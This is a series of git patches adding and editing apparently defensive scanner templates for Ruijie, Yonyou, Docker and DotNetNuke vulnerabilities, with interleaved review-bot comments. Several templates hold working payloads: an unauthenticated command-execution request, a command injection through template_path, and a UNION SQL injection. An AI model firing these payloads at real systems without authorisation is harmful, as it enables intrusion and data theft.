RG-EG easy gateway WEB management system front-end RCE has a command execution vulnerability. An attacker without identity authentication can execute arbitrary commands to control server permissions. + reference: + - https://github.com/xinyisleep/pocscan/blob/main/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7_EG%E6%98%93%E7%BD%91%E5%85%B3_WEB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F_%E5%89%8D%E5%8F%B0RCE.py + metadata: + verified: true + max-request: 1 + fofa-query: body="请输入您的RG-EG易网关的用户名和密码" + tags: ruijie,router,iot,rce + +flow: http(1) && http(2) + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "ruijie")' + condition: and + + - method: GET + path: + - "{{BaseURL}}/update.php?jungle=id" + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" + + - type: status + status: + - 200 From 4a70bb80ca6b2a95c9c1c2286f774a7cf7a64227 Mon Sep 17 00:00:00 2001 
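Review bot: The fingerprint check in the first request, `contains(body, "ruijie")`, is case-sensitive, while the `fofa-query` on the same template identifies the product by a Chinese login prompt rather than by that word, so the first step may not pass on pages that render the vendor name as `Ruijie` or omit it; if the string is expected to be present, `contains(to_lower(body), "ruijie")` is the safer form, otherwise matching on the prompt text the fofa query uses would track the fingerprint more closely. This is inferred from the two fingerprints disagreeing, so verify against a real page before changing it.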
From: Arm!tage Date: Mon, 25 Dec 2023 11:08:11 +0800 Subject: [PATCH 19/64] add docker daemon exposed via http --- http/exposures/docker-daemon-exposed.yaml | 51 +++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 http/exposures/docker-daemon-exposed.yaml diff --git a/http/exposures/docker-daemon-exposed.yaml b/http/exposures/docker-daemon-exposed.yaml new file mode 100644 index 0000000000..e9601013b9 --- /dev/null +++ b/http/exposures/docker-daemon-exposed.yaml @@ -0,0 +1,51 @@ +id: docker-daemon-exposed + +info: + name: Docker Daemon Exposed + author: Arm!tage + severity: critical + description: | + Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system. + metadata: + max-request: 1 + shodan-query: port:2375 product:"docker" + fofa-query: app="docker-Daemon" && port="2375" + verified: true + tags: docker,exposure + +http: + - raw: + - | + GET /version HTTP/1.1 + Host: {{Hostname}} + + - | + GET /v{{version}}/containers/json HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: or + matchers: + - type: word + part: body + words: + - "Id" + - "Names" + - "Image" + - "Command" + - "PrivatePort" + - "PublicPort" + condition: and + - type: word + part: body + words: + - '[]' + + + extractors: + - type: regex + name: version + group: 1 + regex: + - '"ApiVersion":"(.*?)"' + internal: true + From 652b67b88a8f074b6f98c29b3dd148c8aeb1a300 Mon Sep 17 00:00:00 2001 From: Arm!tage Date: Mon, 25 Dec 2023 11:31:03 +0800 Subject: [PATCH 20/64] fix syntax --- http/exposures/docker-daemon-exposed.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/http/exposures/docker-daemon-exposed.yaml b/http/exposures/docker-daemon-exposed.yaml index e9601013b9..b313542011 100644 --- a/http/exposures/docker-daemon-exposed.yaml +++ b/http/exposures/docker-daemon-exposed.yaml 
@@ -15,13 +15,13 @@ info: http: - raw: - - | - GET /version HTTP/1.1 - Host: {{Hostname}} + - | + GET /version HTTP/1.1 + Host: {{Hostname}} - - | - GET /v{{version}}/containers/json HTTP/1.1 - Host: {{Hostname}} + - | + GET /v{{version}}/containers/json HTTP/1.1 + Host: {{Hostname}} matchers-condition: or matchers: From 051c0f22b3a71c5b6832fef166e12f553186319c Mon Sep 17 00:00:00 2001 From: Arm!tage Date: Mon, 25 Dec 2023 11:35:22 +0800 Subject: [PATCH 21/64] remove blank --- http/exposures/docker-daemon-exposed.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/http/exposures/docker-daemon-exposed.yaml b/http/exposures/docker-daemon-exposed.yaml index b313542011..ea9cfd6c0e 100644 --- a/http/exposures/docker-daemon-exposed.yaml +++ b/http/exposures/docker-daemon-exposed.yaml @@ -18,7 +18,7 @@ http: - | GET /version HTTP/1.1 Host: {{Hostname}} - + - | GET /v{{version}}/containers/json HTTP/1.1 Host: {{Hostname}} @@ -40,7 +40,6 @@ http: words: - '[]' - extractors: - type: regex name: version @@ -48,4 +47,3 @@ http: regex: - '"ApiVersion":"(.*?)"' internal: true - From 9ecd7d5a4725f1174937173b492c205b850b45c4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 25 Dec 2023 23:03:42 +0530 Subject: [PATCH 22/64] minor update --- http/exposures/docker-daemon-exposed.yaml | 10 +++------- 1 file changed, 3 insertions(+), 7 deletions(-) diff --git a/http/exposures/docker-daemon-exposed.yaml b/http/exposures/docker-daemon-exposed.yaml index ea9cfd6c0e..d8be8351a2 100644 --- a/http/exposures/docker-daemon-exposed.yaml +++ b/http/exposures/docker-daemon-exposed.yaml @@ -11,7 +11,7 @@ info: shodan-query: port:2375 product:"docker" fofa-query: app="docker-Daemon" && port="2375" verified: true - tags: docker,exposure + tags: docker,exposure,misconfig http: - raw: 
@@ -23,10 +23,10 @@ http: GET /v{{version}}/containers/json HTTP/1.1 Host: {{Hostname}} - matchers-condition: or + matchers-condition: and matchers: - type: word - part: body + part: body_2 words: - "Id" - "Names" @@ -35,10 +35,6 @@ http: - "PrivatePort" - "PublicPort" condition: and - - type: word - part: body - words: - - '[]' extractors: - type: regex From dc0ad486a4b21da96ead01e4fbd353c23236cfa7 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 25 Dec 2023 23:17:23 +0530 Subject: [PATCH 23/64] Update ruijie-rg-eg-web-mis-rce.yaml --- .../ruijie/ruijie-rg-eg-web-mis-rce.yaml | 15 ++++++--------- 1 file changed, 6 insertions(+), 9 deletions(-) diff --git a/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml b/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml index fdacc071c8..820d14b1d4 100644 --- a/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml +++ b/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml @@ -31,13 +31,10 @@ http: - method: GET path: - "{{BaseURL}}/update.php?jungle=id" - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" - - type: status - status: - - 200 + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'regex("uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)", body)' + condition: and From 73d0eafada408020c933adfd9b2646c9d83bf0f9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 25 Dec 2023 17:50:33 +0000 Subject: [PATCH 25/64] Auto Generated Templates Checksum [Mon Dec 25 17:50:33 UTC 2023] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index acb1d61ef4..2bcb839ab1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt 
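Review bot: With the `'[]'` matcher removed in the second hunk and the remaining matcher scoped to `part: body_2`, an exposed daemon that happens to run no containers answers `/containers/json` with an empty array and the template stays silent, even though the unauthenticated `/version` response has already shown the API is reachable. The exposure signal is in the first response: switch the matcher to `part: body_1` with `words: ["ApiVersion", "MinAPIVersion"]` and keep `condition: and` (confirm the second key against the engine versions in scope), then the container-listing fields can remain as an optional second matcher or be dropped. The `matchers-condition: and` this hunk introduces now governs a single matcher, so it can go as well.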
@@ -18,7 +18,7 @@ dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24 dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2 dns/dmarc-detect.yaml:d60f87ac8a617c0496d558269abd50389bbb1b37 -dns/dns-saas-service-detection.yaml:d72feb3c8e7147f9bc37020843647992016b7659 +dns/dns-saas-service-detection.yaml:b8c52b43fb206b466fa4c22b0ac8a553d050b8e5 dns/dns-waf-detect.yaml:f7746eceeca514f20911c4152f2c17bbeb10242c dns/dnssec-detection.yaml:ce828fea84336b2c79b18479063e1e1aaf083592 dns/ec2-detection.yaml:689933e484835fda36da5f3402df123405cc8644 @@ -4081,7 +4081,7 @@ http/exposures/backups/froxlor-database-backup.yaml:a8296d723d545dea6b9d898766db http/exposures/backups/php-backup-files.yaml:704953727958a0d9548426b00a0cb2d8558e31a5 http/exposures/backups/settings-php-files.yaml:466d0c870b539961c1cafb1b2e758aec08711df8 http/exposures/backups/sql-dump.yaml:370dbe1277256449870f9eb992b6a90ca636e887 -http/exposures/backups/zip-backup-files.yaml:47253ccff6b54b2567784cdb93e322e636337303 +http/exposures/backups/zip-backup-files.yaml:487c3ae6d577218c258810b2c0ed55fc361cd3fd http/exposures/configs/accueil-wampserver.yaml:d33e2f3e0f198426999fff6bcd7d1344b5c46240 http/exposures/configs/airflow-configuration-exposure.yaml:b212acd4a5ef9cbb3e0b84da2b4a3cd8599aa1b3 http/exposures/configs/alibaba-canal-info-leak.yaml:9a0d928feb9c023e106d2e5fb6d4d6bab4e84297 
@@ -7707,7 +7707,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:f6a60c9b6234a281d22af2436c44dac52ccac831 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:10238dd5a08d3f60e31e1a95f4f1eb8bc0349f35 +templates-checksum.txt:b7165bda67e32d39a15bd947b0f07412cf4d7d5f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ab1bf228dcd2b534150273d5b3a0068b414aa912 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 25 Dec 2023 17:50:36 +0000 Subject: [PATCH 26/64] Auto Generated New Template Addition List [Mon Dec 25 17:50:35 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e69de29bb2..5d5a921fdf 100644 --- a/.new-additions +++ b/.new-additions @@ -0,0 +1 @@ +http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml From 77a9300ee55269e784a9f32f1848e855a823fc4f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 25 Dec 2023 17:52:10 +0000 Subject: [PATCH 27/64] Auto Template Signing [Mon Dec 25 17:52:10 UTC 2023] :robot: --- dns/dns-saas-service-detection.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/dns/dns-saas-service-detection.yaml b/dns/dns-saas-service-detection.yaml index 6fce566744..5039ed4161 100644 --- a/dns/dns-saas-service-detection.yaml +++ b/dns/dns-saas-service-detection.yaml 
@@ -434,5 +434,4 @@ dns: regex: - "IN\tCNAME\\t(.+)$" - "IN\\s*CNAME\\t(.+)$" - -# digest: 4a0a004730450221008eca40fb73f32c811d6d1d7283bbf220eb09a81bbaa047e4204406dd1c4da012022033a3e578c9ee7d903cff9bc617af38353d49ba0cb65955487aca3e841cdbfc56:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205694ac1cba58232ec715831e94086da7081a9b756f86016358b1347a1a340787022040615d63a66787d706d2be8b3f13cead87f7278c471091a7783bfab4e4fa2aef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b47589f66b86ba52489c6f3ecd0ff3cc80c739b3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 26 Dec 2023 07:08:21 +0530 Subject: [PATCH 28/64] add verified --- http/token-spray/api-openai.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/token-spray/api-openai.yaml b/http/token-spray/api-openai.yaml index a472f5d046..408e12485c 100644 --- a/http/token-spray/api-openai.yaml +++ b/http/token-spray/api-openai.yaml @@ -8,6 +8,7 @@ info: - https://platform.openai.com/docs/api-reference metadata: max-request: 1 + verified: true tags: token-spray,openai self-contained: true From ca155134ce9052f5f1d60b810cf906b313cd3fc7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 26 Dec 2023 01:42:52 +0000 Subject: [PATCH 29/64] Auto Generated New Template Addition List [Tue Dec 26 01:42:52 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 5d5a921fdf..9d24e17c29 100644 --- a/.new-additions +++ b/.new-additions @@ -1 +1,2 @@ +http/token-spray/api-openai.yaml http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml From 895aefe3f5df3676deb791d1b78d896f1ddf2308 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 26 Dec 2023 01:42:58 +0000 Subject: [PATCH 30/64] Auto Generated Templates Checksum [Tue Dec 26 01:42:58 UTC 2023] :robot: --- templates-checksum.txt | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) 
diff --git a/templates-checksum.txt b/templates-checksum.txt index 2bcb839ab1..9c9f108b15 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -18,7 +18,7 @@ dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24 dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2 dns/dmarc-detect.yaml:d60f87ac8a617c0496d558269abd50389bbb1b37 -dns/dns-saas-service-detection.yaml:b8c52b43fb206b466fa4c22b0ac8a553d050b8e5 +dns/dns-saas-service-detection.yaml:d43ab2edca6bc38254ad1f4c4889e5cece34691e dns/dns-waf-detect.yaml:f7746eceeca514f20911c4152f2c17bbeb10242c dns/dnssec-detection.yaml:ce828fea84336b2c79b18479063e1e1aaf083592 dns/ec2-detection.yaml:689933e484835fda36da5f3402df123405cc8644 @@ -6621,6 +6621,7 @@ http/token-spray/api-nytimes.yaml:515f52e0dbaa76c67e47a0e0f63a607b966520d7 http/token-spray/api-onelogin.yaml:c1970dce04c68ff40687f9aa5189fbdf2f07bdd2 http/token-spray/api-onyphe.yaml:c931393e726323591b3f170ddda5e4dd548e4c8a http/token-spray/api-open-page-rank.yaml:291f62ec42ea118f68223e44043d39e1c6d616a2 +http/token-spray/api-openai.yaml:9d86191e26bae37c68d5986d46e1ee613b81eb7c http/token-spray/api-opengraphr.yaml:5c15cfdbb054e77687564346951337cc0904f151 http/token-spray/api-openweather.yaml:489a77cb31f3b4510b748c12ec2104d6a43a6ec7 http/token-spray/api-opsgenie.yaml:bb7a91bd82ee7c96607e1963dbbf8b41af56832a 
@@ -7208,6 +7209,7 @@ http/vulnerabilities/ruijie/ruijie-excu-shell.yaml:4e44d86d3461ede6a3e205a00a96c http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml:d21221f94ba84906b86aebb2ef888e8df203035f http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml:c3789288ed1f6805695c9ccc837a1b056f017975 http/vulnerabilities/ruijie/ruijie-password-leak.yaml:b40b0764c02ffb6af9faef8f9153a8995c0f0522 +http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml:1ab8db1b41bfc5e613f4fbe99f417739d332eb31 http/vulnerabilities/ruijie-eg-login-rce.yaml:95135a8fbb28e97e78f39b9c640f6dca3a49c283 http/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml:48d0b9ac33013573db9fa5ecc17282a88729fda9 http/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml:a4258c6a3d83986629e3a30e17e98de93180ffdc @@ -7707,7 +7709,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:f6a60c9b6234a281d22af2436c44dac52ccac831 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:b7165bda67e32d39a15bd947b0f07412cf4d7d5f +templates-checksum.txt:42fd128a2bf9803063b17dfe3796e7c460f14fa4 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 1919622dc66c48e8f08c8ecd388013e2a04f74c8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 26 Dec 2023 01:44:36 +0000 Subject: [PATCH 31/64] Auto Template Signing [Tue Dec 26 01:44:36 UTC 2023] :robot: --- http/token-spray/api-openai.yaml | 1 + http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/token-spray/api-openai.yaml b/http/token-spray/api-openai.yaml index 408e12485c..1cfe8f579d 100644 --- a/http/token-spray/api-openai.yaml +++ b/http/token-spray/api-openai.yaml 
@@ -44,3 +44,4 @@ http: - 'invalid_api_key' condition: or negative: true +# digest: 4a0a004730450220422646717a6541b29d8c7b75c9b7e1fd29aacfdb32eadd984cd42d10bce9bb8f022100834fe5f01797940eff4f945f61a4e9522a53cfd16f9d6aed5b323fcc0e357051:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml b/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml index 820d14b1d4..608dcd099f 100644 --- a/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml +++ b/http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml @@ -38,3 +38,4 @@ http: - 'status_code == 200' - 'regex("uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)", body)' condition: and +# digest: 4a0a004730450220298e4a509f8a4ada203541928158a36e026d8558df1144d2456f0fcac669d723022100b0a5525c3c77ed802dbb654d57bf01b32bf01a811ee1acc813e65a87559786f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 88e104e37f8207f69e3ad54dd3fcd1be4e4bbb30 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 26 Dec 2023 07:20:08 +0530 Subject: [PATCH 32/64] Create ruijie-rg-uac-nmc-sync-rce.yaml --- .../ruijie/ruijie-rg-uac-nmc-sync-rce.yaml | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 http/vulnerabilities/ruijie/ruijie-rg-uac-nmc-sync-rce.yaml diff --git a/http/vulnerabilities/ruijie/ruijie-rg-uac-nmc-sync-rce.yaml b/http/vulnerabilities/ruijie/ruijie-rg-uac-nmc-sync-rce.yaml new file mode 100644 index 0000000000..e7ff7a3dba --- /dev/null +++ b/http/vulnerabilities/ruijie/ruijie-rg-uac-nmc-sync-rce.yaml 
@@ -0,0 +1,40 @@ +id: ruijie-rg-uac-nmc-sync-rce + +info: + name: Ruijie RG-UAC nmc_sync.php - Remote Code Execution + author: DhiyaneshDk + severity: critical + description: | + There is a command execution vulnerability in the nmc_sync.php interface of Ruijie's RG-UAC unified online behavior management and audit system. An unauthenticated attacker can execute arbitrary commands to control server permissions. + reference: + - https://github.com/xinyisleep/pocscan/blob/main/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7_EG%E6%98%93%E7%BD%91%E5%85%B3_%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F_%E5%89%8D%E5%8F%B0RCE.py + metadata: + verified: true + max-request: 1 + fofa-query: title="RG-UAC登录页面" && body="admin" || app="Ruijie-RG-UAC" || title="rg-uac" + tags: rg-uac,file-upload,intrusive,ruijie + +variables: + random_str: "{{rand_base(6)}}" + match_str: "{{md5(random_str)}}" + +http: + - raw: + - | + GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|echo+{{match_str}}+>+{{random_str}}.txt|cat HTTP/1.1 + Host: {{Hostname}} + + - | + GET /view/systemConfig/management/{{random_str}}.txt HTTP/1.1 + Host: {{Hostname}} + + - | + GET /view/systemConfig/management/nmc_sync.php?center_ip=127.0.0.1&template_path=|rm+{{random_str}}.txt|cat HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 200" + - "contains(body_2, '{{match_str}}')" + condition: and From 977907614074186ce67343e25dbe2a39f1435429 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 26 Dec 2023 07:50:21 +0530 Subject: [PATCH 33/64] Create yonyou-ksoa-dept-sqli.yaml --- .../yonyou/yonyou-ksoa-dept-sqli.yaml | 38 +++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml 
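Review bot: `max-request: 1` in `metadata` is wrong for this template: the `http` section sends three raw requests (inject, read back, clean up), so it should be `max-request: 3`. The third request deletes the `{{random_str}}.txt` artifact the first request drops into the web root, but `matchers` never checks `status_code_3`, so a failed `rm` leaves a world-readable file on the target with no signal to the operator; consider adding `'status_code_3 == 200'` to the DSL list or at least stating the artifact in `description`. The `file-upload` tag also misdescribes the technique, which is shell command injection through `template_path`, so `rce` would be the accurate tag. The single reference filename appears to describe an EG gateway PoC rather than the RG-UAC `nmc_sync.php` issue; worth confirming before merge.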
diff --git a/http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml new file mode 100644 index 0000000000..c01041ca93 --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml @@ -0,0 +1,38 @@ +id: yonyou-ksoa-dept-sqli + +info: + name: YonYou KSOA common/dept.jsp - SQL injection + author: DhiyaneshDK + severity: critical + description: | + Yonyou KSOA contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + reference: + - https://mp.weixin.qq.com/s/I6aG2vFIi5nbVZfuVNpyDw + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cwe-id: CWE-89 + metadata: + verified: true + max-request: 1 + fofa-query: app="用友-时空KSOA" + tags: yonyou,oa,sqli,ksoa + +variables: + num: "999999999" + +http: + - method: GET + path: + - "{{BaseURL}}/common/dept.jsp?deptid=1'+UNION+ALL+SELECT+60%2Csys.fn_sqlvarbasetostr(HASHBYTES('MD5'%2C'{{num}}'))--+" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '0x{{md5({{num}})}}' + + - type: status + status: + - 200 From 3115271e9fbfeac3c952010515ed0f69e75b8535 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 26 Dec 2023 07:58:10 +0530 Subject: [PATCH 34/64] additional matcher with or condition --- http/exposures/docker-daemon-exposed.yaml | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/http/exposures/docker-daemon-exposed.yaml b/http/exposures/docker-daemon-exposed.yaml index d8be8351a2..bd264d57f2 100644 --- a/http/exposures/docker-daemon-exposed.yaml +++ b/http/exposures/docker-daemon-exposed.yaml @@ -23,7 +23,7 @@ http: GET /v{{version}}/containers/json HTTP/1.1 Host: {{Hostname}} - matchers-condition: and + matchers-condition: or matchers: - type: word part: body_2 
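Review bot: The word matcher `'0x{{md5({{num}})}}'` is case-sensitive, while nuclei's `md5()` helper emits lowercase hex and SQL Server's `fn_sqlvarbasetostr(HASHBYTES(...))` rendering, to my recollection, emits uppercase hex; if that holds, a genuinely injectable target would be missed. Adding `case-insensitive: true` to that word matcher removes the dependence on the server's hex casing at no cost. The nested `{{md5({{num}})}}` form is also unusual; nuclei normally references a variable inside a helper bare, i.e. `'0x{{md5(num)}}'`, so please confirm the nested expansion is what produced the `verified: true` result.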
@@ -36,6 +36,14 @@ http: - "PublicPort" condition: and + - type: word + part: body_2 + words: + - '[]' + - '"ImageID": + - '"HostConfig":' + condition: and + extractors: - type: regex name: version From def6cc9a4a29684d6717421b5388607099eaf966 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 26 Dec 2023 07:59:22 +0530 Subject: [PATCH 35/64] Update docker-daemon-exposed.yaml --- http/exposures/docker-daemon-exposed.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposures/docker-daemon-exposed.yaml b/http/exposures/docker-daemon-exposed.yaml index bd264d57f2..1442d6c668 100644 --- a/http/exposures/docker-daemon-exposed.yaml +++ b/http/exposures/docker-daemon-exposed.yaml @@ -40,7 +40,7 @@ http: part: body_2 words: - '[]' - - '"ImageID": + - '"ImageID":' - '"HostConfig":' condition: and From 71410961884a22bc5dd81b89608a7b96083e3952 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 26 Dec 2023 08:01:41 +0530 Subject: [PATCH 36/64] lint fix --- http/exposures/docker-daemon-exposed.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposures/docker-daemon-exposed.yaml b/http/exposures/docker-daemon-exposed.yaml index 1442d6c668..b0f94be1b1 100644 --- a/http/exposures/docker-daemon-exposed.yaml +++ b/http/exposures/docker-daemon-exposed.yaml @@ -43,7 +43,7 @@ http: - '"ImageID":' - '"HostConfig":' condition: and - + extractors: - type: regex name: version From 8b25425d9b3ce41c3d006c418ee535b6ecaf8f62 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 26 Dec 2023 14:54:37 +0530 Subject: [PATCH 37/64] Create CVE-2015-2794.yaml --- http/cves/2015/CVE-2015-2794.yaml | 44 +++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/cves/2015/CVE-2015-2794.yaml diff --git a/http/cves/2015/CVE-2015-2794.yaml b/http/cves/2015/CVE-2015-2794.yaml new file mode 100644 index 0000000000..3b04db48ad --- /dev/null +++ b/http/cves/2015/CVE-2015-2794.yaml 
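Review bot: The new matcher combines `'[]'` with `'"ImageID":'` and `'"HostConfig":'` under `condition: and`, which can never be satisfied: a body that is exactly the empty list contains no `ImageID`/`HostConfig` keys, and a body that lists containers is not `[]`, so the `matchers-condition: or` fallback still never fires for an idle daemon. Separately, `- '"ImageID":` lacks its closing single quote and makes the file invalid YAML. Keep the empty-list case as its own single-word matcher, `words:` / `- '[]'` with no `condition: and`, and move the `ImageID`/`HostConfig` tokens into the first matcher if they are wanted. The enclosing `http` request block starts outside the hunk.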
@@ -0,0 +1,44 @@ +id: CVE-2015-2794 + +info: + name: DotNetNuke 07.04.00 - Administration Authentication Bypass + author: 1337kro + severity: high + description: | + The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2015-2794 + - https://www.exploit-db.com/exploits/39777 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2015-2794 + cwe-id: CWE-264 + epss-score: 0.9711 + epss-percentile: 0.99736 + cpe: cpe:2.3:a:dotnetnuke:dotnetnuke:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: dotnetnuke + product: dotnetnuke + verified: true + fofo-query: app="DotNetNuke" + tags: cve,cve2015,dotnetnuke,auth-bypass,install + +http: + - method: GET + path: + - "{{BaseURL}}/Install/InstallWizard.aspx?__VIEWSTATE" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Administrative Information" + - "Database Information" + condition: and + + - type: status + status: + - 200 From fcd3d55a60c8d8b61395e6056e83a6b08268cc11 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 26 Dec 2023 15:00:03 +0530 Subject: [PATCH 38/64] severity update and lint fix --- http/cves/2015/CVE-2015-2794.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2015/CVE-2015-2794.yaml b/http/cves/2015/CVE-2015-2794.yaml index 3b04db48ad..ca3d0cdf13 100644 --- a/http/cves/2015/CVE-2015-2794.yaml +++ b/http/cves/2015/CVE-2015-2794.yaml 
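Review bot: `fofo-query: app="DotNetNuke"` under `metadata` is a typo for the `fofa-query` key, so the search query is ignored by the tooling that indexes it; change it to `fofa-query: app="DotNetNuke"`. The check itself is read-only (it only requests the wizard page and looks for the "Administrative Information"/"Database Information" form text), which is the right level of intrusiveness for a finding of this severity. A short `remediation:` line (upgrade to 7.4.1 or later and remove or lock down `Install/` after setup) would make the finding actionable for the reader.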
